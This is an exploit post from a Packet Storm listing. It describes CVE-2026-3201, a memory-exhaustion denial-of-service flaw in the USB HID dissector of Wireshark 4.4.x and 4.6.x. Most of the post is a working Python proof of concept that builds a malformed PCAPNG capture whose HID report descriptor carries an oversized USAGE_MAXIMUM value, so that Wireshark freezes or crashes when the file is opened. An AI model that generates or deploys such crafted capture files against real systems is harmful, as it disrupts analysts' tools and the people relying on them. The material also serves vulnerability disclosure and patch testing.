## https://sploitus.com/exploit?id=PACKETSTORM:216622
=============================================================================================================================================
| # Title : Wireshark 4.6.0 to 4.6.3, 4.4.0 to 4.4.13 USB HID Protocol Dissector Memory Exhaustion |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.wireshark.org/ |
=============================================================================================================================================
[+] Summary : CVE-2026-3201 is a Denial-of-Service (DoS) vulnerability affecting the USB HID protocol dissector in Wireshark versions:
4.6.0 through 4.6.3
4.4.0 through 4.4.13
The vulnerability is triggered when Wireshark parses a specially crafted USB HID Report Descriptor containing an excessively large USAGE_MAXIMUM value.
When such a malformed capture file (e.g., PCAPNG with USBPcap link type 249) is opened, the dissector attempts to allocate memory based on the attacker-controlled value.
Due to insufficient bounds checking, this can cause uncontrolled memory growth (e.g., via internal array expansion such as wmem_array_grow()), leading to:
Excessive memory consumption
Application freeze
Application crash
[+] Vulnerability Type : Category: Denial of Service (DoS)
[+] POC :
import struct
from scapy.all import *
def generate_perfect_exploit():
print("[*] Building Refined Malicious USB HID Payload...")
malicious_hid = (
b"\x05\x01"
b"\x09\x06"
b"\xa1\x01"
b"\x19\x00"
b"\x2b\x00\x00\x00\x10"
b"\xc0"
)
header_len = 27
data_len = len(malicious_hid)
total_len = header_len + data_len
usb_header = struct.pack("<H Q H B B B B I",
header_len,
0xDEADBEEFCAFEBABE,
1,
1,
0x80,
0x02,
ord('C'),
data_len
)
usb_header += b"\x00" * (header_len - len(usb_header))
full_pkt = usb_header + malicious_hid
with open("wireshark_usb_dos_fixed.pcapng", "wb") as f:
f.write(struct.pack("<I I I I Q", 0x0A0D0D0A, 0x1C, 0x1A2B3C4D, 0x00010000, 0xFFFFFFFFFFFFFFFF))
f.write(struct.pack("<I I H H I", 0x00000001, 0x14, 249, 0, 0x00000000))
epb_body = struct.pack("<I I I I I", 0, total_len, total_len, 0, 0) + full_pkt
pad = (4 - (len(epb_body) % 4)) % 4
epb_total_len = len(epb_body) + 12 + pad
f.write(struct.pack("<I I", 0x00000006, epb_total_len)) # Type & Total Length
f.write(epb_body + (b"\x00" * pad))
f.write(struct.pack("<I", epb_total_len)) # Total Length footer
print("[!] Success: 'wireshark_usb_dos_fixed.pcapng' generated.")
print("[*] Logic: USAGE_MAX (0x10000000) will trigger wmem_array_grow() exhaustion.")
if __name__ == "__main__":
generate_perfect_exploit()
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================